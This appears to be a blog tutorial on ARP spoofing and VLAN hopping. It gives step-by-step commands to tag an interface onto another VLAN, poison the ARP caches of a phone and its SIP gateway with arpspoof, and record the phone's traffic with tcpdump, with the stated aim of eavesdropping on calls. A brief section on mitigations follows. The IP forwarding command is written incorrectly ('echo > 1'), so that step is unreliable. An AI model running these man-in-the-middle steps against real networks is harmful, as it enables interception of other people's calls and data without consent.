Arp Spoofing & VLAN Hopping

I’ll touch on what this is briefly. You will have to research more if you aren’t familar with VLAN’s and ARP. Arp spoofing is a layer-2 attack where you spoof the MAC address’s, leading to the arp cache being poisoned on a device.

This can be done to do a MITM (man-in-the-middle) attack. Where you then sit between two devices, such as a router and end-user device, routing traffic in-between them. From there further tools can be run to inspect traffic, modify it, and etc…

Now ARP spoofing theoretically works only on the VLAN you are on. VLAN’s weren’t really created for security at first. They were made so broadcast domains would be smaller, and to help limit broadcast storms. Of course now modern switches add more features, to help secure your VLAN’s.

When you are on a certain VLAN, you can’t communicate with the other VLAN’s. What is possible is to do VLAN hopping. In order to do VLAN hopping your device will need to support VLAN tagging. Linux makes this very easy so I will be using Ubuntu for the example below.

Lets start off by installing arpspoof and vlan. This will allow us to do a MITM attack, and VLAN hopping.

sudo apt-get install vlan arpspoof

Once that is done lets use modprobe to enable 8021q tagging. Next we will setup a new interface on vlan 4 in this example, with an IP address of 10.0.88.134

sudo modprobe 8021q
sudo vconfig add eth0 4
sudo ifconfig eth0.4 up
sudo ifconfig eth0.4 10.0.88.134 up

Now you should be able to communicate with VLAN 4. The Next part is to do arp spoofing on this VLAN. For example let’s say this is a voice VLAN and we would like to do a MITM attack to eavesdrop on phone conversations. In the Example below we have chosen device 10.0.88.133 to eavesdrop on.

First off we will run the command below to enable forwarding of all packets. This way traffic is forwarded without being dropped.

echo > 1 /proc/sys/net/ipv4/ip_forward

Finally the two commands below specify the interface to use eth0.4 since we are doing this on VLAN 4. The first command sets up spoofing from phone to phone SIP gateway. Next command does it in reverse, to finish setup of the MITM.

arpspoof -i eth0.4 -t 10.0.88.133 10.0.0.1

arpspoof -i eth0.4 -t 10.0.0.1 10.0.88.133

Once this is done traffic will be forwarded between the two devices. Allowing us to run further tools to exploit the traffic. Below Tcpdump is used to save a pcap of the traffic.

tcpdump -w info.pcap host 10.0.88.133

What this shows us is that default VLAN settings aren’t enough. Also most phones will act as a switch, the phone is on a seperate VLAN than the PC. This is something that can be exploited. Of course this applies to any other devices as well.

Phones are just a great example to illustrate VLAN hopping. Since the phone and PC both connect into one port on a switch, that in turn supports two VLAN’s (one of the PC, and another of the phone). This seems like a secure setup, but still can be exploited.

To mitigate this limiting the amount of devices that can connect on a switch port helps. To prevent arp spoofing use static arp entry for the default gateway, and switch (that is if switch does layer 3 routing).

This link goes over VLAN hopping in more detail and also includes some common mitigation steps. One of them being the common one to not use VLAN 1, and disable trunking on ports that don’t need it.

https://www.exploit-db.com/docs/english/45050-vlan-hopping-attack.pdf

Leave a Reply

Your email address will not be published. Required fields are marked *